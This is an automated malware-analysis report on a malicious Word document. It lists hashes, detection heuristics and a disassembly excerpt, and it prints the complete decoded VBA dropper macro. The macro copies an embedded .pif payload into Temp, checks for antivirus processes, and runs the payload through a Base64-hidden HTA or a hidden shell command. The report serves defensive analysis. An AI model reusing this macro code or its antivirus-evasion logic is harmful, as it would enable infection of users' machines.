Office (OLE) malware analysis — malicious · f177faf798a82a82

MALICIOUS

Office (OLE)

207.5 KB Created: 2018-07-18 13:51:00 Authoring application: Microsoft Office Word First seen: 2018-10-07

MD5: 3d2076f0f3bf9c4669436e752c53aba7 SHA-1: 88842a0c01e378f65095d15ed423358f58a2d7ea SHA-256: f177faf798a82a82d0d6f489e226ce51961d6eb6769b5355645d1bb5925eb237

840 Risk Score

Malware Insights

MITRE ATT&CK

T1203 Exploitation for Client Execution T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is a malicious Microsoft Word document that exploits CVE-2007-3899 to achieve arbitrary code execution. The Document_Open macro uses WScript.Shell and WMI to download and execute a payload, identified as '6.exe' and '6.pif' from the embedded OLE package. The VBA code also utilizes Base64 decoding to construct commands, indicating a downloader or stager functionality.

Heuristics 22

CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899

Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT

OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
ClamAV: Doc.Dropper.Agent-6614792-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6614792-0

XOR-encoded strings (key 0xE6) critical SC_XOR_ENCODED

Found 3 Windows library/API name(s) XOR-encoded with single-byte key 0xE6: 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc'

Disassembly

x86 disassembly · validity: uncertain (0.584) — 1/1 branch targets land on an instruction boundary (100% coherence)

0001BDAB  aa                stosb byte ptr es:[edi], al
0001BDAC  898782aa8f84      mov dword ptr [edi - 0x7b70557e], eax
0001BDB2  94                xchg esp, eax
0001BDB3  87949fa7e66526    xchg dword ptr [edi + ebx*4 + 0x2665e6a7], edx
0001BDBA  e56f              in eax, 0x6f
0001BDBC  63fa              arpl dx, di
0001BDBE  1919              sbb dword ptr [ecx], ebx
0001BDC0  19be6d63fa19      sbb dword ptr [esi + 0x19fa636d], edi
0001BDC6  1919              sbb dword ptr [ecx], ebx
0001BDC8  b66d              mov dh, 0x6d
0001BDCA  ab                stosd dword ptr es:[edi], eax
0001BDCB  16                push ss
0001BDCC  b719              mov bh, 0x19
0001BDCE  b33a              mov bl, 0x3a
0001BDD0  6f                outsd dx, dword ptr [esi]
0001BDD1  63de              arpl si, bx
0001BDD3  1919              sbb dword ptr [ecx], ebx
0001BDD5  19b60ee6e6e6      sbb dword ptr [esi - 0x191919f2], esi
0001BDDB  e6be              out 0xbe, al
0001BDDD  0debb08f94        or eax, 0x948fb0eb
0001BDE2  92                xchg edx, eax
0001BDE3  93                xchg ebx, eax
0001BDE4  878aa78a8a89      xchg dword ptr [edx - 0x76757559], ecx
0001BDEA  85e6              test esi, esp
0001BDEC  6526e56f          in eax, 0x6f
0001BDF0  63da              arpl dx, bx
0001BDF2  1919              sbb dword ptr [ecx], ebx
0001BDF4  19be6d73da19      sbb dword ptr [esi + 0x19da736d], edi
0001BDFA  1919              sbb dword ptr [ecx], ebx
0001BDFC  b46d              mov ah, 0x6d
0001BDFE  a316b619b3        mov dword ptr [0xb319b616], eax
0001BE03  3a6fa3            cmp ch, byte ptr [edi - 0x5d]
0001BE06  5a                pop edx
0001BE07  b60e              mov dh, 0xe
0001BE09  e6e6              out 0xe6, al

Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE

OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
VBA macros detected medium 9 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

  Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ("Temp") & "\6.exe", vbHide

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
Set wsh = VBA.CreateObject("WScript.Shell")
```
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Matched line in script
```
Set myProg = GetObject("winmgmts:")
```
VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER

VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
Matched line in script
```
Set myProg = GetObject("winmgmts:")
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set wsh = VBA.CreateObject("WScript.Shell")
```
GetObject call high OLE_VBA_GETOBJ

GetObject call
Matched line in script
```
Set myProg = GetObject("winmgmts:")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

FileCopy Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDVDLnBpZg=="), vbUnicode), Environ("Temp") & StrConv(DecodeBase64("XDYuZXhl"), vbUnicode)

Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Reference to GetProcAddress API high SC_STR_GETPROCADDRESS

Reference to GetProcAddress API
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT

Reference to VirtualProtect API
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4223 bytes
SHA-256: `7f3207c157a4af28f1f50f661d561e0e4606587e9a9bce9bb9f06ff329133209`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 2 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next Selection.MoveDown Unit:=wdScreen, Count:=7 Selection.MoveDown Unit:=wdScreen, Count:=7 Selection.MoveRight Unit:=wdCharacter, Count:=13 Selection.TypeBackspace Selection.Copy FileCopy Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDVDLnBpZg=="), vbUnicode), Environ("Temp") & StrConv(DecodeBase64("XDYuZXhl"), vbUnicode) FileCopy Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDVDLnBpZg=="), vbUnicode), Environ("Temp") & StrConv(DecodeBase64("XDYucGlm"), vbUnicode) Selection.TypeBackspace Set d = New DataObject d.SetText " " d.PutInClipboard Selection.MoveUp Unit:=wdScreen, Count:=7 Selection.MoveUp Unit:=wdScreen, Count:=7 Selection.MoveLeft Unit:=wdCharacter, Count:=13 Dim t As Date t = Now Do DoEvents Loop Until Now >= DateAdd("s", 3, t) Call Module1.killo End Sub Private Sub Document_Close() Call closee End Sub Private Function DecodeBase64(ByVal strData As String) As Byte() Dim objXML As MSXML2.DOMDocument Dim objNode As MSXML2.IXMLDOMElement Set objXML = New MSXML2.DOMDocument Set objNode = objXML.createElement("b64") objNode.dataType = "bin.base64" objNode.Text = strData DecodeBase64 = objNode.nodeTypedValue Set objNode = Nothing Set objXML = Nothing End Function Attribute VB_Name = "Module1" Sub killo() ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument Application.Quit End Sub Attribute VB_Name = "Module2" Sub closee() Dim myPrC, myProg Set myProg = GetObject("winmgmts:") Set myPrC = myProg.ExecQuery("SELECT * FROM Win32_Process") For Each x In myPrC Set wsh = VBA.CreateObject("WScript.Shell") Dim pipec As Boolean: pipec = True If x.Name = "bdagent.exe" Then Open Environ("Temp") & "\1.hta" For Output As #1 Print #1, StrConv(DecodeBase64("PGh0bWw+DQo8aGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCI+DQogICAgICAgICAgV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KICAgICA8L1NDUklQVD4NCiAgICA8dGl0bGU+QXBwbGljYXRpb24gRXhlY3V0ZXI8L3RpdGxlPg0KICAgIDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIgDQogICAgICAgIEFQUExJQ0FUSU9OTkFNRT0iQXBwbGljYXRpb24gRXhlY3V0ZXIiIA0KICAgICAgICBCT1JERVI9Im5vIg0KICAgICAgICBDQVBUSU9OPSJubyINCiAgICAgICAgU0hPV0lOVEFTS0JBUj0ieWVzIg0KICAgICAgICBTSU5HTEVJTlNUQU5DRT0ieWVzIg0KICAgICAgICBTWVNNRU5VPSJ5ZXMiDQogICAgICAgIFNDUk9MTD0ibm8i"), vbUnicode) Print #1, StrConv(DecodeBase64("IFdJTkRPV1NUQVRFPSJub3JtYWwiPg0KICAgIDxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQogICAgDQogICAgICAgIFdzaFNoZWxsID0gbmV3IEFjdGl2ZVhPYmplY3QoIldTY3JpcHQuU2hlbGwiKTsNCiAgICAgICAgV3NoU2hlbGwuUnVuKCI2LmV4ZSIsIDEsIGZhbHNlKTsNCiAgICAgICAgDQogICAgPC9zY3JpcHQ+DQogPFNDUklQVCBMQU5HVUFHRT0iVkJTY3JpcHQiPg0KICAgICAgICAgIFdpbmRvdy5DbG9zZQ0KICAgICA8L1NDUklQVD4NCjwvaGVhZD4NCjxib2R5Pg0KICAgDQo8L2JvZHk+DQo8L2h0bWw+DQo="), vbUnicode) Close #1 wsh.Run Environ("Temp") & "\1.hta", 0, False Exit Sub End If If x.Name = "PSUAMain.exe" Then Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ("Temp") & "\6.exe", vbHide Exit Sub End If Next Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ("Temp") & "\6.pif", vbHide End Sub Private Function DecodeBase64(ByVal strData As String) As Byte() Dim objXML As MSXML2.DOMDocument Dim objNode As MSXML2.IXMLDOMElement Set objXML = New MSXML2.DOMDocument Set objNode = objXML.createElement("b64") objNode.dataType = "bin.base64" objNode.Text = strData DecodeBase64 = objNode.nodeTypedValue Set objNode = Nothing Set objXML = Nothing End Function
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1593437820/Ole10Native	79124 bytes
SHA-256: `6031690cf968272617a33a024553603ba523f2719ed136aea22065092503f5bc`
`ole10native_00_5C.pif`	ole-package-payload	OLE Ole10Native payload: ObjectPool/_1593437820/Ole10Native; display_name=5C.pif; full_path=C:\Users\win7home\AppData\Local\Temp\5C.pif; temp_path=; def_file=	78848 bytes
SHA-256: `aa5e9fed3431b832eac02e777df648318d8e06740ed99021708c449972588f23`

Open this report in the interactive analyzer, or submit your own file for analysis.